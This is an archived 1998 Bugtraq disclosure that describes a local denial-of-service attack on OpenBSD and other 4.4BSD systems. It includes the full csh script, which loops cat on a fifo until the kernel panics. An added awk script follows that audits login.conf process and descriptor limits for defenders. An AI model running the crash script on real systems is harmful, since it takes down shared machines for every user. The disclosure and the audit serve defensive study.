OpenBSD mkfifo DOS attack
Description: You can run the *BSD kernel out of non-pageable memory by making a fifo (via mkfifo) and forking a bunch of processes trying to cat it.
Author: Jason Downs <downsj@DOWNSJ.COM>
Compromise: Crash the system (stupid DOS attack)
Vulnerable Systems: OpenBSD, presumably NetBSD, FreeBSD, BSDI
Date: 25 January 1998

Date: Sun, 25 Jan 1998 15:54:25 -0800
From: Jason Downs <downsj@DOWNSJ.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: Simple OpenBSD crash script

Here is a rather simple method of crashing most OpenBSD systems (and, I
assume, NetBSD or anything else running 4.4BSD vm without this problem fixed).

Most, if not all, kernels have process limits high enough for a normal
user to run the kernel out of non-pageable map entries. The easiest way
that I have found to do this is with the enclosed script.

If the per-user process/descriptor limits are high enough, running this script
will result in a kernel panic.

#!/bin/csh
set path = ( /usr/bin /usr/sbin /bin /sbin )
unlimit
cd /tmp
if ( -e fifo ) then
rm fifo
endif
mkfifo fifo
while ( 1 )
cat fifo >& /dev/null &
end
--
Jason Downs
downsj@downsj.com
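
A defender-side check for the condition the post names (per-user process/descriptor limits set high enough), as an added example that is not part of the original post. It assumes a host that sets per-class limits in a login.conf-style file with the `maxproc` and `openfiles` capabilities; the sample file, the ceilings (256 and 512) and the function names are constructed for illustration.

```shell
#!/bin/sh
# Added example. Constructed login.conf-style sample, not taken from a real host.
sample_login_conf() {
cat <<'EOF'
default:\
    :maxproc-max=128:\
    :openfiles-max=256:
staff:\
    :maxproc-max=infinity:\
    :openfiles-max=1024:\
    :tc=default:
daemon:\
    :maxproc=64:\
    :tc=default:
guest:\
    :ignorenologin:
EOF
}

# audit_limits MAXPROC_CEILING OPENFILES_CEILING < file
# Prints "<class> <capability> <value>" for every hard limit that is missing,
# non-numeric (e.g. infinity) or above the ceiling. Hard limits are what count:
# the posted script's `unlimit` raises each soft limit to its hard limit.
audit_limits() {
    awk -v pmax="$1" -v fmax="$2" '
    function report(cls, cap, val, ceiling, tc) {
        # Unset with tc= means inherited; inheritance is not resolved here.
        if (val == "unset") { if (!tc) print cls, cap, val; return }
        if (val !~ /^[0-9]+$/ || val + 0 > ceiling + 0) print cls, cap, val
    }
    function check(rec,   n, f, i, kv, cls, proc, files, tc) {
        n = split(rec, f, ":")
        cls = f[1]; sub(/\|.*/, "", cls)         # first name of the class
        proc = files = "unset"; tc = 0
        for (i = 2; i <= n; i++) {
            split(f[i], kv, "=")
            if (kv[1] == "tc") tc = 1
            # A bare name sets both soft and hard; -max sets the hard limit.
            if (kv[1] == "maxproc" || kv[1] == "maxproc-max") proc = kv[2]
            if (kv[1] == "openfiles" || kv[1] == "openfiles-max") files = kv[2]
        }
        report(cls, "maxproc-max", proc, pmax, tc)
        report(cls, "openfiles-max", files, fmax, tc)
    }
    { sub(/^[ \t]+/, "") }                       # drop indentation
    /^#/ || /^$/ { next }                        # skip comments and blanks
    /\\$/ { sub(/\\$/, ""); buf = buf $0; next } # join continued lines
    { check(buf $0); buf = "" }
    END { if (buf != "") check(buf) }
    '
}

sample_login_conf | audit_limits 256 512
```

On the sample, the `staff` class is flagged for both limits and `guest` for having none at all; `daemon` is not flagged because its `maxproc` is low and its descriptor limit is inherited through `tc=`.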
This page is part of Fyodor's exploit
world.